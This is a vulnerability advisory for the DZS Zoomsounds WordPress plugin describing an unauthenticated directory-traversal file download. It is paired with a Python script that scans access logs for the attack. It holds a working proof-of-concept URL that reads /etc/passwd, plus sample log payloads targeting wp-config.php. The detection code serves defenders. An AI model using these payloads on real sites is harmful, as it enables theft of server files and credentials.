WordPress Plugin Vulnerabilities
DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
Description
The plugin allows unauthenticated users to download arbitrary files, including sensitive configuration files such as wp-config.php, via the dzsap_download action by using directory traversal in the link parameter.
Proof of Concept
https://example.com/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd
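A log check for the request pattern above, added here as an example and not taken from the advisory or the plugin. It assumes combined-format web server access logs; the sample lines, IP addresses and function names are constructed for illustration. Percent-decoding is repeated so that encoded and double-encoded `..` sequences in `link` are also caught.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (not real traffic); the last two are non-matching requests.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2021:10:00:00 +0000] "GET /MYzoomsounds/?action=dzsap_download&link=../../../../etc/passwd HTTP/1.1" 200 1523 "-" "curl/7.68.0"
203.0.113.5 - - [01/Sep/2021:10:00:02 +0000] "GET /?action=dzsap_download&link=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3120 "-" "curl/7.68.0"
198.51.100.7 - - [01/Sep/2021:10:01:00 +0000] "GET /?action=dzsap_download&link=%252e%252e%252fwp-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Sep/2021:10:02:00 +0000] "GET /?action=dzsap_download&link=https://example.com/wp-content/uploads/track.mp3 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Sep/2021:10:03:00 +0000] "GET /blog/?p=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(link):
    """True if any path segment of the decoded value is '..'."""
    norm = fully_decode(link).replace("\\", "/")
    return ".." in norm.split("/")

def find_hits(log_text):
    """Return (client_ip, http_status, decoded_link) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)  # decodes one level
        if "dzsap_download" not in query.get("action", []):
            continue
        for link in query.get("link", []):
            if has_traversal(link):
                hits.append((m["ip"], int(m["status"]), fully_decode(link)))
    return hits

if __name__ == "__main__":
    for ip, status, link in find_hits(SAMPLE_LOG):
        print(f"{ip} status={status} link={link}")
```

A hit with status 200 and a non-trivial response size deserves priority during triage, since it suggests the file was served. The check only inspects the query string, which is where the proof of concept places the parameters.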
Affects Plugins
References
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
DigitalJessica Ltd
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-31
Added
2021-08-31
Last Updated
2022-04-11